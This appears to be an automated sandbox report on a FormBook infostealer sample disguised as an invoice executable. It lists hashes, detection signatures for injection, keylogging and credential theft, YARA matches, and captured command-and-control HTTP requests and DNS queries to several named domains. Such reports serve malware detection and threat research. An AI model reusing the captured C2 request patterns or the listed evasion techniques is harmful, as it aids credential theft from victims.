Windows Analysis Report
Revised Invoice H000127896.exe

Overview

General Information

Sample name: Revised Invoice H000127896.exe
Analysis ID: 1520359
MD5: 2a489cab1a6113a0f082d8bfee40ead9
SHA1: 9d422436b62b0afc1c4a24295940ef93724a1580
SHA256: 3f92b6ed5e7ebacc4f0039ca5fcbdd19d4690ca3fd0b73dc2c9e2df580669e6f
Tags: exeFormbookPaymentuser-cocaman
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: Revised Invoice H000127896.exe Avira: detected
Source: Revised Invoice H000127896.exe ReversingLabs: Detection: 42%
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Revised Invoice H000127896.exe Joe Sandbox ML: detected
Source: Revised Invoice H000127896.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: replace.pdb source: svchost.exe, 00000002.00000002.2532507526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490823870.000000000321A000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000002.3292070177.0000000000F38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.2532507526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490823870.000000000321A000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000002.3292070177.0000000000F38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MUjPkRkjOWKkX.exe, 00000004.00000000.2443952915.000000000080E000.00000002.00000001.01000000.00000005.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3291334317.000000000080E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: Revised Invoice H000127896.exe, 00000000.00000003.2068504373.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Revised Invoice H000127896.exe, 00000000.00000003.2068190374.0000000004660000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422918073.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420841777.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.000000000399E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2532709579.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002BDE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2534511525.000000000288D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Revised Invoice H000127896.exe, 00000000.00000003.2068504373.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Revised Invoice H000127896.exe, 00000000.00000003.2068190374.0000000004660000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2422918073.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420841777.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.000000000399E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000002.3292894877.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2532709579.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002BDE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2534511525.000000000288D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: replace.exe, 00000005.00000002.3293409108.000000000306C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000000.2598292163.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2821347362.0000000039BDC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: replace.exe, 00000005.00000002.3293409108.000000000306C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000000.2598292163.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2821347362.0000000039BDC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0213C240 FindFirstFileW,FindNextFileW,FindClose, 5_2_0213C240
Source: C:\Windows\SysWOW64\replace.exe Code function: 4x nop then xor eax, eax 5_2_02129A70
Source: C:\Windows\SysWOW64\replace.exe Code function: 4x nop then mov ebx, 00000004h 5_2_029304E0
Source: Joe Sandbox View IP Address: 217.160.0.27 217.160.0.27
Source: Joe Sandbox View IP Address: 3.33.130.190 3.33.130.190
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile, 0_2_004422FE
Source: global traffic HTTP traffic detected: GET /9eeu/?npb=3FKhBrgHxb5d5XX&jz=sYxoUF2rFRCkhaAkZ/A9Uj7dMzTBzKsd56kaE+tBLdvFK0LLAdAC/H8PE2DtjqQpoemNjozj05nG5pG/fmy7eOvuwMQDTc0cfupU/VfFqgUlIE8j+TMRgVEnKsfoFtzhDw== HTTP/1.1Host: www.07t90q.vipAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic HTTP traffic detected: GET /4yov/?jz=wLmY7AOB32o0S2u42dQo01BhAozElJEy6rFAsgDZdNn+sW1g/TF+eJ3R19ZQOPzynTi6ZGviANY3o1+5ycRViPNI2Nw+8mxels4+I7slmp23cyQYmVgQCmd7LylHNAhJBA==&npb=3FKhBrgHxb5d5XX HTTP/1.1Host: www.concept.pinkAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic HTTP traffic detected: GET /6tyq/?jz=jni3yiZJ4S7NmP87TLfQaIY/X77PcNTCOCcZxoXAf1kPTUY8H/4jiZTjzWgxt/+cQPOpbdgRSQIQgbB1DSTxgzvKKTE3COfRXcz2obzALE1MyEAjEb6tnUq41l0wGlUpcQ==&npb=3FKhBrgHxb5d5XX HTTP/1.1Host: www.5oxzis.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic HTTP traffic detected: GET /j39u/?jz=Bz1f0c7bYWyPEXgQH2KhVZZ8APOK/AslnFtnj2cpqvgmCRIzB1oQIQo/LvP87UgGwTfaSD+LVTW+9AK3Nxg5qUhvSHaGZLmYP9ngab3X35l8/z/r5KgCJlFWcHojvmaM7w==&npb=3FKhBrgHxb5d5XX HTTP/1.1Host: www.kuaimaolife.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Source: global traffic DNS traffic detected: DNS query: www.07t90q.vip
Source: global traffic DNS traffic detected: DNS query: www.concept.pink
Source: global traffic DNS traffic detected: DNS query: www.5oxzis.top
Source: global traffic DNS traffic detected: DNS query: www.kuaimaolife.shop
Source: global traffic DNS traffic detected: DNS query: www.nodigitalsmoke.org
Source: unknown HTTP traffic detected: POST /4yov/ HTTP/1.1Host: www.concept.pinkAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.concept.pinkReferer: http://www.concept.pink/4yov/Connection: closeContent-Length: 203Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36Data Raw: 6a 7a 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 55 48 36 6c 6f 64 38 50 2f 31 70 6e 4f 49 43 4d 39 59 30 4c 34 35 51 33 75 79 62 4f 48 65 6e 42 74 6b 31 2b 67 58 78 33 55 74 32 6a 6c 63 52 73 48 4c 6a 41 6e 44 7a 4c 52 79 2f 71 41 75 6b 45 74 67 61 37 6d 5a 38 37 76 66 46 50 38 2f 74 2b 6f 44 74 56 6f 4d 5a 30 51 4b 49 39 75 4c 66 2b 41 44 59 54 33 55 68 59 57 55 6c 4a 4f 51 5a 74 51 57 78 47 55 68 59 32 6c 34 4f 41 5a 65 4f 48 44 48 65 68 51 46 30 74 67 39 50 6c 76 73 32 74 7a 6a 32 75 49 4a 63 42 53 4f 41 4e 6f 4f 31 66 38 70 45 70 4b 6d 75 71 41 4e 2f 55 57 37 74 4e 64 54 56 68 61 4c 36 6d 72 45 73 3d Data Ascii: jz=9JO441eEy3RNUH6lod8P/1pnOICM9Y0L45Q3uybOHenBtk1+gXx3Ut2jlcRsHLjAnDzLRy/qAukEtga7mZ87vfFP8/t+oDtVoMZ0QKI9uLf+ADYT3UhYWUlJOQZtQWxGUhY2l4OAZeOHDHehQF0tg9Plvs2tzj2uIJcBSOANoO1f8pEpKmuqAN/UW7tNdTVhaL6mrEs=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 07:08:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
